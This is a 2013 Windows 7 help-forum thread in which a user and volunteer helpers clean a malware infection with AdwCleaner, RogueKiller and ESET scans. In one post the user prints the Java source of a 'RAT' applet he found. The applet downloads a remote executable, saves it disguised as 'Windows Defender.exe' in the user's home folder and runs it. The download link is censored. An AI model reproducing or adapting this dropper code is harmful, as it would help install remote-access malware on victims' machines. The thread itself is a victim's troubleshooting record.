Windows 7 Forums

Welcome to Windows 7 Forums. Our forum is dedicated to helping you find support and solutions for any problems regarding your Windows 7 PC be it Dell, HP, Acer, Asus or a custom build. We also provide an extensive Windows 7 tutorial section that covers a wide range of tips and tricks.


Windows 7: Information from another thread

05 Apr 2013   #11
zl7man

Windows 7 Home Premium 64bit
 
 

Update: so I found a flash drive that is not bricked according to my mac laptop. I am not using the one that is on the off chance that it is infected and that the virus can be cross platform (are there any known?). The problem is that the new one had contents so I am going to have to wait till tomorrow to get the go ahead from my parents to simply have a backup for the flash drive (will erase when they give the go ahead). I already did backup the information though (on mac which from what I know is clean (Also Avast! anti-virus on it)).

I have to wait to try and fix this, then again time is of the essence but that time limit seems to have been long past if I only just found that folder. Guess Avast was not allowed to scan it?

EDIT: going to put a picture of stuff that Avast said from last scan on this computer


My System SpecsSystem Spec
.
05 Apr 2013   #12
Golden
Microsoft MVP

Windows 7 Ult. x64
 
 

Quote   Quote: Originally Posted by zl7man View Post
virus can be cross platform (are there any known?).
Very, very few. Just use it, it will be fine.
My System SpecsSystem Spec
05 Apr 2013   #13
zl7man

Windows 7 Home Premium 64bit
 
 

did some digging and here is essentially what the RAT.java was

(wish there was spoiler function)
Code:
import java.applet.Applet;
import java.io.BufferedOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;
import java.net.URLConnection;

@SuppressWarnings("serial")
public class RAT extends Applet {

	public void start() {
		String userDirectory = System.getProperty("user.home");
		final String DL_LINK = "    censored dropbox link";
		System.out.println("Starting");
		download(DL_LINK, userDirectory + "\\Windows Defender.exe");
		System.out.println("Done");
		Runtime run = Runtime.getRuntime();
		try {
			run.exec("\"" + userDirectory + "\\Windows Defender.exe\"");
		} catch (IOException e) {
			System.out.println("There is an error!");
			File exe = new File("D\\Windows Defender.exe");
			exe.delete();
		}
	}

	public void download(final String address, final String localFileName) {
		OutputStream out = null;
		URLConnection conn = null;
		InputStream in = null;
		try {
			final URL url = new URL(address);

			out = new BufferedOutputStream(new FileOutputStream(localFileName));
			conn = url.openConnection();
			in = conn.getInputStream();

			final byte[] buffer = new byte[1024];
			int numRead;
			while ((numRead = in.read(buffer)) != -1) {
				out.write(buffer, 0, numRead);
			}
		} catch (final Exception exception) {
		} finally {
			try {
				if (in != null) {
					in.close();
				}
				if (out != null) {
					out.close();
				}
			} catch (final IOException ioe) {
			}
		}
	}
}
Instead of Windows Defender.exe it would be rataman.exe
My System SpecsSystem Spec
.

05 Apr 2013   #14
zl7man

Windows 7 Home Premium 64bit
 
 

Quote   Quote: Originally Posted by Golden View Post
Quote   Quote: Originally Posted by zl7man View Post
virus can be cross platform (are there any known?).
Very, very few. Just use it, it will be fine.
Looks like that flash drive is really dead. Not recognized by mac as being there.
(was a really old flash drive)

edit: see first post for picture of the folder in question.
My System SpecsSystem Spec
05 Apr 2013   #15
zl7man

Windows 7 Home Premium 64bit
 
 

Added more logs and pictures. DDS had an interesting remark in attach file
4/2/2013 7:26:02 PM, Error: volsnap [36] - The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.

Shadow copy.... um...
My System SpecsSystem Spec
05 Apr 2013   #16
Jacee
Microsoft MVP

Windows 7 Ultimate 32bit SP1
 
 

My System SpecsSystem Spec
05 Apr 2013   #17
zl7man

Windows 7 Home Premium 64bit
 
 

That makes sense. Well that solves that problem. I am going to sleep for tonight... be back tomorrow to check for new stuff.
My System SpecsSystem Spec
06 Apr 2013   #18
zl7man

Windows 7 Home Premium 64bit
 
 

So I decided to do something stupid, but it worked out I guess. Used AdwCleaner to delete the folder and checked where the folder was it is gone. Going to run full scan with Avast! now.

(Attached AdwCleaner delete log)
ran Roguekiller and attached the log because I am unsure about the registry stuff it mentioned


Attached Files
File Type: txt AdwCleaner[S2].txt (1.4 KB, 3 views)
File Type: txt RKreport[5]_S_04062013_02d1446.txt (2.1 KB, 3 views)
My System SpecsSystem Spec
07 Apr 2013   #19
Jacee
Microsoft MVP

Windows 7 Ultimate 32bit SP1
 
 

I'd like you to scan your machine with ESET OnlineScan
  1. Hold down Control and click on the following link to open ESET OnlineScan in a new window.
    ESET OnlineScan
  2. Click the button.
  3. For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    1. Click on to download the ESET Smart Installer. Save it to your desktop.
    2. Double click on the icon on your desktop.
  4. Check
  5. Click the button.
  6. Accept any security warnings from your browser.
  7. Check
  8. Push the Start button.
  9. ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  10. When the scan completes, push
  11. Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  12. Push the button.
  13. Push
My System SpecsSystem Spec
08 Apr 2013   #20
zl7man

Windows 7 Home Premium 64bit
 
 

I was unable to click list of found threats because there were none. So I have attached a print screen of that report:

Edit: so does that mean that I should be fine


Attached Thumbnails
Information from another thread-clear.png  
My System SpecsSystem Spec
Reply

 Information from another thread




Thread Tools Search this Thread
Search this Thread:

Advanced Search




Similar help and support threads
Thread Forum
USB KVM Information
I have a home PC and a work laptop, the latter I take home to work from home. I would like to be able to use my home screen, keyboard and mouse with the laptop, and I know that a KVM should allow me to do this. However, I would like to make it simple, and deal with as few connections to the...
Hardware & Devices
Can't find the prefix's thread for post's? (eg. [note] , [information]
Basically say's it in the title :p I seen a link before to all the prefix's for posting. Like making them move and adding in the information, note, etc
Chillout Room
Need information
I just bought a used laptop that has Ubuntu OS but I want to go back to use Windows 7 instead. It came with Windows 7 but the previous owner installed Ubuntu. I press F8 and nothing happens. Does that mean I have to buy Windows 7 and intall it myself? I have a Toshiba Satellite L455. Thanks for...
General Discussion
Need Some Information
Well I have been using Ubuntu for the past year because I had alot of bad experience with Windows Vista. I hurd from alot of people that Windows 7 was a great improvement of its past version Vista. So I decided that I will switch to Windows 7 but before I do that I was wondering if there is a...
General Discussion


Our Sites

Site Links

About Us

Find Us

Windows 7 Forums is an independent web site and has not been authorized, sponsored, or otherwise approved by Microsoft Corporation. "Windows 7" and related materials are trademarks of Microsoft Corp.

Designer Media Ltd

All times are GMT -5. The time now is 07:28.

Twitter Facebook Google+



Windows 7 Forums

Seven Forums Android App Seven Forums IOS App